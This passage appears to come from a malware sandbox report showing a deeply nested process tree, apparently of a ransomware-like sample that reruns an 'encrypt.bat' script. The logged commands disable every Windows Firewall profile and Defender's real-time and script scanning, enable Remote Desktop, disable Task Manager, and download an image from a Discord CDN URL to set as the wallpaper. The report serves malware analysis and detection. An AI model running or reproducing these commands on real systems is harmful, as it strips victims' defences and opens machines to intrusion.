                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                              netsh advfirewall set allprofiles state off
                                                                                                                                                                                                                                                                                                                                                                                              28⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                                                              PID:4824
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                              powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                                                                                                                                                                                                                                                                              28⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:3248
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                                                                                                                                                                                                                28⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:2776
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                                                                                                                                                                                                                  28⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:4876
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                                                                                                                                                                                                                    28⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                    PID:4816
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                                                                                                                                                                                                                    28⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:2068
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                      powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                                                                                                                                                                                                                      28⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1532
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                                                                                                                                                                                                                                                                                                                        28⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                        PID:4396
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                        powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                                                                                                                                                                                                                                                                                                                                        28⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                        PID:3956
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                                                                                                                                                                                                                                                                                                                                          29⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:1208
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                                                                                                                                                                                                                                                                                                                                              30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:3796
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                                                                                                                30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1552
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                                                                                                                                                                                                                                                                                                                                                  30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3248
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                                                                                                    30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2068
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                                                                                                                                                                                                                                      30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3516
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                                                                                                                                                                                                                                        30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:728
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                                                                                                                                                                                                                                          30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5016
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                                                                                                                                                                                                                                            30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4824
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                                                                                                                                                                                                                                              30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3984
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              netsh firewall set opmode disable
                                                                                                                                                                                                                                                                                                                                                                                                                              30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4280
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              netsh firewall set opmode mode=DISABLE
                                                                                                                                                                                                                                                                                                                                                                                                                              30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3792
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              netsh advfirewall set currentprofile state off
                                                                                                                                                                                                                                                                                                                                                                                                                              30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:64
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              netsh advfirewall set domainprofile state off
                                                                                                                                                                                                                                                                                                                                                                                                                              30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2136
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              netsh advfirewall set privateprofile state off
                                                                                                                                                                                                                                                                                                                                                                                                                              30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1048
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                netsh advfirewall set publicprofile state off
                                                                                                                                                                                                                                                                                                                                                                                                                                30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1084
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                netsh advfirewall set allprofiles state off
                                                                                                                                                                                                                                                                                                                                                                                                                                30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4464
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                  30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1212
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                    30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:752
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                    30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2996
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                      30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5032
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                        30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:400
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                          30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3796
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                                                                                                                                                                                                                                                                                                                                                          30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2776
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                                                                                                                                                                                                                                                                                                                                                                          30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2012
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                                                                                                                                                                                                                                                                                                                                                                            31⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1096
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                                                                                                                                                                                                                                                                                                                                                                                32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4800
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4008
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4356
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                      32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4224
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                                        32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3484
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1328
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                                            32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4332
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4520
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  netsh firewall set opmode disable
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  netsh firewall set opmode mode=DISABLE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  netsh advfirewall set currentprofile state off
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    netsh advfirewall set domainprofile state off
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      netsh advfirewall set privateprofile state off
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:452
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        netsh advfirewall set publicprofile state off
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3272
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          netsh advfirewall set allprofiles state off
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    33⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        34⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          34⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            34⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              34⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                34⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  34⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    34⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      34⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                30⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              28⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
